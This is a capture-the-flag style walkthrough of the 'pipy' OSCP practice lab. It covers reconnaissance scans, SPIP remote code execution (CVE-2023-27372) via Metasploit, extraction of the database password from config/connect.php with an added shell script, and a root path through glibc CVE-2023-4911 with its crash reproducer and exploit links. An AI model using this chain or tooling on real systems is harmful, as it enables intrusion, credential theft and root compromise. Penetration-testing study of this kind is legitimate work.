OSCP practice lab
Lab overview
Name | Difficulty | Skills covered
pipy | easy | SPIP exploitation, internal credential collection, MySQL exploitation, CVE-2023-4911 exploitation
Information gathering
Host discovery
nmap -sn 192.168.1.0/24
Port scan (all TCP ports, with version detection; the target is 192.168.1.55)
┌──(root㉿kali)-[~]
└─# nmap -sV -Pn -p- -T4 192.168.1.55
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-27 20:28 EST
Nmap scan report for 192.168.1.55
Host is up (0.00053s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
MAC Address: 08:00:27:32:34:5E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.36 seconds
Directory scan
┌──(root㉿kali)-[~]
└─# dirb http://192.168.1.55
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Feb 27 20:29:27 2024
URL_BASE: http://192.168.1.55/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.55/ ----
==> DIRECTORY: http://192.168.1.55/config/
==> DIRECTORY: http://192.168.1.55/ecrire/
+ http://192.168.1.55/index.php (CODE:200|SIZE:7519)
==> DIRECTORY: http://192.168.1.55/javascript/
+ http://192.168.1.55/LICENSE (CODE:200|SIZE:35147)
==> DIRECTORY: http://192.168.1.55/local/
==> DIRECTORY: http://192.168.1.55/prive/
+ http://192.168.1.55/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://192.168.1.55/squelettes-dist/
==> DIRECTORY: http://192.168.1.55/tmp/
==> DIRECTORY: http://192.168.1.55/vendor/
---- Entering directory: http://192.168.1.55/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
Gaining a foothold
The directories dirb turned up (ecrire/, prive/, squelettes-dist/) are SPIP's, and the target runs SPIP 4.2.0. Looking that version up in searchsploit gives an unauthenticated remote code execution bug, CVE-2023-27372 (SPIP before 4.2.1 mishandles serialized form values submitted to the public area), so no credentials are needed.
Metasploit ships a module for it (search for spip in msfconsole); running it against the target returns a shell directly.
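Before firing the module it is worth confirming the version in a way that does not depend on the directory listing. The script below is an added example, not part of the original write-up or of SPIP: it reads the version from the Composed-By response header that SPIP sends on every page and compares it against the versions in which CVE-2023-27372 was fixed (3.2.18, 4.0.10, 4.1.8, 4.2.1). The sample response, the function names and the exit-status convention are this example's own.

```shell
#!/bin/sh
# Added example; not part of the original write-up. SPIP answers every request
# with a "Composed-By: SPIP <version> @ www.spip.net ..." header, which is the
# quickest version fingerprint. CVE-2023-27372 (unauthenticated RCE through
# serialized form values in the public area) was fixed in 3.2.18, 4.0.10,
# 4.1.8 and 4.2.1. The response below is constructed for this example.

SAMPLE_HEADERS='HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Composed-By: SPIP 4.2.0 @ www.spip.net
Content-Type: text/html; charset=utf-8'

# spip_version <raw headers>: print the version from Composed-By, or nothing
spip_version() {
    printf '%s\n' "$1" | tr -d '\r' \
      | sed -n 's/^Composed-By: SPIP \([0-9][0-9.]*\).*/\1/p' | head -n1
}

# version_lt A B: true when dotted version A is older than B
# (expects three numeric components, x.y.z, as SPIP releases use)
version_lt() {
    a1=${1%%.*}; r=${1#*.}; a2=${r%%.*}; a3=${r#*.}
    b1=${2%%.*}; r=${2#*.}; b2=${r%%.*}; b3=${r#*.}
    [ "$a1" -lt "$b1" ] && return 0
    [ "$a1" -gt "$b1" ] && return 1
    [ "$a2" -lt "$b2" ] && return 0
    [ "$a2" -gt "$b2" ] && return 1
    [ "$a3" -lt "$b3" ]
}

# cve_2023_27372_affected <version>: 0 when the version predates the fix
# on its own release branch
cve_2023_27372_affected() {
    case "$1" in
        4.2.*) version_lt "$1" 4.2.1 ;;
        4.1.*) version_lt "$1" 4.1.8 ;;
        4.0.*) version_lt "$1" 4.0.10 ;;
        *)     version_lt "$1" 3.2.18 ;;  # 3.2.x and older; EOL branches never got a fix
    esac
}

# check_spip <raw headers>: verdict on stdout; exit 0 only when exploitable
check_spip() {
    v=$(spip_version "$1")
    if [ -z "$v" ]; then
        echo "no Composed-By header: not SPIP, or the header is suppressed"
        return 2
    fi
    if cve_2023_27372_affected "$v"; then
        echo "SPIP $v: CVE-2023-27372 applies (unauthenticated RCE)"
        return 0
    fi
    echo "SPIP $v: fixed for CVE-2023-27372"
    return 1
}

# dry run against the constructed response
check_spip "$SAMPLE_HEADERS"
```

Against a live target, feed it the real headers: `check_spip "$(curl -si http://192.168.1.55/)"`. Administrators can strip the Composed-By header, in which case the generator meta tag on the front page and the exposed ecrire/ and prive/ paths are the fallback fingerprints.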
Privilege escalation
Credential harvesting on the box comes first: the MySQL database holds a user's account password (the database login itself sits in SPIP's config/connect.php).
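Getting into MySQL means finding the application's own database login. The script below is an added example, not the write-up's steps: it pulls the credentials out of the spip_connect_db() call that SPIP's installer writes to config/connect.php and builds the matching mysql client command. Only the layout of that call comes from SPIP; the file contents, the credentials and the function names are constructed for this example.

```shell
#!/bin/sh
# Added example; not part of the original write-up. SPIP's installer writes the
# database login into config/connect.php as a single call:
#   spip_connect_db(host, port, user, pass, db, type, prefix, auth, charset);
# With a shell as the web server user, that file is the first place to look.
# The file contents and credentials below are constructed for this example.

SAMPLE_CONNECT_PHP='<?php
if (!defined("_ECRIRE_INC_VERSION")) return;
$GLOBALS["spip_connect_version"] = 0.8;
spip_connect_db("localhost","","spip_user","S3cret_DB_pw","spip_db","mysql","spip","","utf8");
?>'

# write_sample <path>: materialise the constructed connect.php for a dry run
write_sample() {
    printf '%s\n' "$SAMPLE_CONNECT_PHP" > "$1"
}

# spip_connect_db_args <connect.php>: print host|port|user|pass|db
spip_connect_db_args() {
    sed -n 's/.*spip_connect_db(\(.*\));.*/\1/p' "$1" \
      | tr -d "'\"" \
      | awk -F, '{ printf "%s|%s|%s|%s|%s\n", $1, $2, $3, $4, $5 }'
}

# mysql_cmd <connect.php>: the mysql client invocation for those credentials
# (SPIP leaves the port empty when it means the default 3306)
mysql_cmd() {
    args=$(spip_connect_db_args "$1")
    host=${args%%|*}; rest=${args#*|}
    port=${rest%%|*}; rest=${rest#*|}
    user=${rest%%|*}; rest=${rest#*|}
    pass=${rest%%|*}; db=${rest#*|}
    [ -n "$port" ] || port=3306
    printf 'mysql -h %s -P %s -u %s -p%s %s\n' "$host" "$port" "$user" "$pass" "$db"
}

# dry run against the constructed file
tmp=$(mktemp)
write_sample "$tmp"
mysql_cmd "$tmp"
rm -f "$tmp"
```

Once connected, SHOW TABLES; in the SPIP database and look past SPIP's own spip_auteurs table (login and hashed pass) for anything the box author added; the user account password the next step relies on came out of this database. Passing the password with -p on the command line exposes it in the process list, so on a shared host prefer typing it at the prompt.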
The check below shows the box is exposed to the glibc dynamic loader (ld.so) local privilege escalation, CVE-2023-4911 ("Looney Tunables"). The loader's parser for the GLIBC_TUNABLES environment variable has a buffer overflow, and because ld.so processes that variable even when it starts a set-user-ID binary, a local attacker can run a SUID program such as su with a crafted GLIBC_TUNABLES and end up as root. The bug exists upstream in glibc 2.34 through 2.38; this target is Ubuntu 22.04 (glibc 2.35) without the fix. The PoC check command is the Qualys reproducer: if ld.so dies with a segmentation fault, the loader is unpatched.
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "G=`printf '%08192x' 1`" /usr/bin/su --help
https://github.com/leesh3288/CVE-2023-4911#poc-of-cve-2023-4911-looney-tunables
https://github.com/RickdeJager/CVE-2023-4911
Download one of the two exploits, build it with make and run it on the target; it drops straight into a root shell. Exploits for this bug depend on the target's glibc build, so pick one whose README lists the target's distribution (Ubuntu 22.04 here).
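The check command above relies on seeing "Segmentation fault" on a terminal, which is easy to miss in a reverse shell. The script below is an added example, not part of the original write-up or of either exploit repository: it wraps the same reproducer so the result is an exit status, and first reports the glibc version so you know whether the release is in the upstream-affected range at all. The function names and the looney_check.sh filename guard are this example's own choices.

```shell
#!/bin/sh
# Added example; not part of the original write-up. It wraps the Qualys
# reproducer quoted above so the outcome is an exit status rather than a
# "Segmentation fault" you have to eyeball. The function names and the
# looney_check.sh filename guard are this example's own choices.

# glibc_version: "2.35"-style string from the loader banner (empty on musl etc.)
glibc_version() {
    ldd --version 2>/dev/null | sed -n '1s/.* \([0-9][0-9]*\.[0-9][0-9]*\)$/\1/p'
}

# glibc_in_upstream_range <major.minor>: 0 when the bug exists upstream
# (introduced in 2.34, gone in 2.39). Distro builds of 2.34..2.38 may carry
# the backported fix, so this only says "worth testing", not "vulnerable".
glibc_in_upstream_range() {
    major=${1%%.*}; minor=${1#*.}
    [ "$major" -eq 2 ] && [ "$minor" -ge 34 ] && [ "$minor" -le 38 ]
}

# tunables_crash <binary>: run the reproducer against <binary>.
# Returns 0 when the process died of SIGSEGV (exit status 128+11 = 139),
# i.e. ld.so overflowed while parsing the malformed GLIBC_TUNABLES.
tunables_crash() {
    rc=0
    env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" \
           "G=$(printf '%08192x' 1)" "$1" --help >/dev/null 2>&1 || rc=$?
    [ "$rc" -eq 139 ]
}

# looney_check [binary]: print a verdict; exit 0 only when the loader crashed.
# /usr/bin/su is the setuid target used in the original check command.
looney_check() {
    bin=${1:-/usr/bin/su}
    v=$(glibc_version)
    if [ -n "$v" ] && glibc_in_upstream_range "$v"; then
        echo "glibc $v: upstream-affected release, running crash test"
    else
        echo "glibc ${v:-unknown}: outside 2.34-2.38, running crash test anyway"
    fi
    if tunables_crash "$bin"; then
        echo "VULNERABLE: $bin segfaulted in ld.so on GLIBC_TUNABLES (CVE-2023-4911)"
        return 0
    fi
    echo "not vulnerable: $bin survived the malformed GLIBC_TUNABLES"
    return 1
}

# Run when executed as looney_check.sh; skipped when sourced into another script.
if [ "${0##*/}" = "looney_check.sh" ]; then
    looney_check "$@"
fi
```

Save it as looney_check.sh on the target and run `sh looney_check.sh`; a zero exit status means the loader crashed and the exploit is worth building. The version check is deliberately advisory only: a 2.35 build with the distro backport survives the reproducer, and that survival, not the version string, is what decides.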
Originally published on the WeChat public account 贝雷帽SEC: 【OSCP】pipy